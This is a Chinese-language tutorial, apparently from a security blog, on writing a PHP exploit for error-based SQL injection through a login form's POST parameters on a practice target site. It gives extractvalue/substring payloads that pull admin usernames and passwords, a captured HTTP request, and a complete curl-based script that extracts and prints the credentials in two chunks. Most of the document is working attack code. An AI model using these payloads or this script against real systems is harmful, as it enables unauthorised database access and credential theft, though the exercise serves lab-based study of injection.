摘要

上一篇注入exp的简单编写，这一篇 将会提高难度，写一些复杂的exp。

 

1、 post注入编写

 

访问暗月靶机测试系统 登录页面存在报错注入

 

 

查询数据的的长度
'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#
因为 使用 extractvalue函数只能报错32长度的数据   通过上面语句先获取数据的长度 再使用 substring进行数据截取。

用php来编写exp
先用burpsuite 抓取数据包

POST /login.phpHTTP/1.1Host:www.moontester.comUser-Agent:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip, deflateReferer:http://www.moontester.com/login.phpContent-Type:application/x-www-form-urlencodedContent-Length:213Connection: closeCookie:PHPSESSID=k343qa72c7ro2psc0ivengqap6Upgrade-Insecure-Requests:1 username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95

 

2、模拟post进行url请求

?php
/**
     * 模拟post进行url请求
     * @param string $url
     * @param array $post_data
     */
    function request_post($url = '', $post_data = array()) {
        if (empty($url) || empty($post_data)) {
            return false;
        }
        
        $o = "";
        foreach ( $post_data as $k => $v )
        {
            $o.= "$k=" . urlencode( $v ). "&" ;
        }
        $post_data = substr($o,0,-1);
        $postUrl = $url;
        $curlPost = $post_data;
        $ch = curl_init();//初始化curl
        curl_setopt($ch, CURLOPT_URL,$postUrl);//抓取指定网页
        curl_setopt($ch, CURLOPT_HEADER, 0);//设置header
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
        curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
        curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
        $data = curl_exec($ch);//运行curl
        curl_close($ch);
        
        return $data;
    }
?>

使用curl需要php开启 curl扩展 extension=php_curl.dll
这个部分需要变成的字符要变成 php的数组。

username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=1234536&submit=%E7%99%BB%E5%BD%95

变成php数组

$post_data=array("username"=>"'andextractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
整个exp的代码

 

<?php
/**
     * 模拟post进行url请求
     * @param string $url
     * @param array $post_data
     */
    function request_post($url = '', $post_data = array()) {
        if (empty($url) || empty($post_data)) {
            return false;
        }
        
        $o = "";
        foreach ( $post_data as $k => $v ) 
        { 
            $o.= "$k=" . urlencode( $v ). "&" ;
        }
        $post_data = substr($o,0,-1);
        $postUrl = $url;
        $curlPost = $post_data;
        $ch = curl_init();//初始化curl
        curl_setopt($ch, CURLOPT_URL,$postUrl);//抓取指定网页
        curl_setopt($ch, CURLOPT_HEADER, 0);//设置header
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
        curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
        curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
        $data = curl_exec($ch);//运行curl
        curl_close($ch);
        
        return $data;
    }
    #$post_data="username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95";
    $post_data=array("username"=>"'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
    
    
    function get_strlen($url){
            $post_data=array("username"=>"'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
            $html = request_post($url,$post_data);
            preg_match("/~(\d+)/", $html,$matches);
            return $matches[1];
            
    
    }
    
    $url = "http://www.moontester.com/login.php";
    
    $lengstr = get_strlen($url);
    
   
    if($lengstr){
            $payload =array("username"=>"'and extractvalue(1, concat(0x7e,substring((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1),1,32)))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
             $html = request_post($url,$payload);
             preg_match("/~#(.*?)\'/", $html,$matches);
             
            $m1 = $matches[1];
            
            
            $payload2 =array("username"=>"'and extractvalue(1, concat(0x7e,substring((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1),32,{$lengstr})))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
            
            $html = request_post($url,$payload2);
  
            preg_match("/~(.*?)#/", $html,$matches);
            $m2 = $matches[1];
            
            echo "[+]".$m1.$m2."[+]";
    
    }else{
            echo "[-]error[-]";
    }

代码解释
先获取数据的长度
第一次获取1-32 第二次获取 32-40 的数据
两次获取的数据并接再一起输出。